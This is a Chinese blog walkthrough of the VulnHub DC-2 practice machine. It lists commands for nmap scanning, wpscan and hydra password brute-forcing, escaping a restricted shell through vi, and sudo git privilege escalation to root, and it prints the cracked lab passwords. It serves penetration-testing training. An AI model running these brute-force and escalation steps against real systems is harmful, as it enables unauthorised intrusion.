zoukankan      html  css  js  c++  java
  • vulnhub靶机DC2记录

    0x00 靶机详情

    下载地址:https://download.vulnhub.com/dc/DC-2.zip

    根据描述,和DC-1一样,需要找到5个flag

     

    0x01 靶机练习

    nmap探测存活主机

    nmap -sP 192.168.217.0/24

    查到靶机ip为192.168.217.130

    nmap扫描开放端口

    nmap -A -T4 -p- 192.168.217.130

    开放了80(http)和7744(ssh)端口

    访问靶机主页

    找到Flag1

    根据提示,需要使用Cewl工具制作密码字典,登录后查看下一个flag

    使用Cewl生成密码字典

    cewl dc-2 -w dc2pass.txt

    网站使用的CMS是wordpress,可以使用wpscan工具对该CMS进行扫描

    使用wpscan扫描网站用户

    wpscan --url http://dc-2 -e u
    

    发现三个用户名:admin、jerry、tom,使用用这三个用户名生成用户字典进行爆破

    访问wordpress默认后台/wp-login.php,找到后台登录界面

    使用wpscan爆破用户密码

    wpscan --url http://dc-2 -U dc2user.txt -P dc2pass.txt 
    

    成功爆破出jerry和tom用户密码

    使用这两个用户进行登录

    jerry用户下找到Flag2

    根据提示,需要找到另一个切入点,所以可能需要从另一个7744(ssh)端口入手

    使用hydra工具爆破ssh

    hydra -L dc2user.txt -P dc2pass.txt  -vV 192.168.217.130  -s 7744 ssh

    成功爆破出用户名:tom 密码:parturient

     使用tom用户登录ssh

    ssh tom@192.168.217.130 -p 7744
    

    登录ssh后发现 Flag3,cat查看失败,发现被限制了。经查找,需要绕过rbash

    Restricted shell绕过

    尝试发现vi可以使用

    执行命令

    vi 1
    :set shell =/bin/sh
    :shell(执行完上一条再执行)
    export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin (设置环境变量)
    

    成功读取Flag3

    提示中提到jerry和su,尝试切换到jerry用户

    使用之前爆破出的web下jerry用户密码:adipiscing 成功登录

    在jerry用户根目录下,发现Flag4,直接查看

    根据提示需要使用git命令

    git提权 

    sudo -l          #查看可以无密码使用root权限的命令
    sudo git help config  #提权
    !/bin/sh
    

    成功提权

    在根目录发现最终Flag

  • 相关阅读:
    ParamCount、ParamStr
    写一个可拖动的 TShape 回复 "韦韦" 的问题
    读十六进制文本到 Btye 数组的函数 回复 "峰哥!!!" 的问题
    网站速度优化
    [新功能]新增分类浏览页面
    [CN.Text开发笔记]嵌套Repeater的问题
    中秋祝福
    10 Golden rules for publishing your blog
    HttpCompressionModule 6的一个Bug及使用效果
    [CN.Text开发笔记]OnInit与运行期数据绑定
  • 原文地址:https://www.cnblogs.com/Cl0wn/p/12922194.html
Copyright © 2011-2022 走看看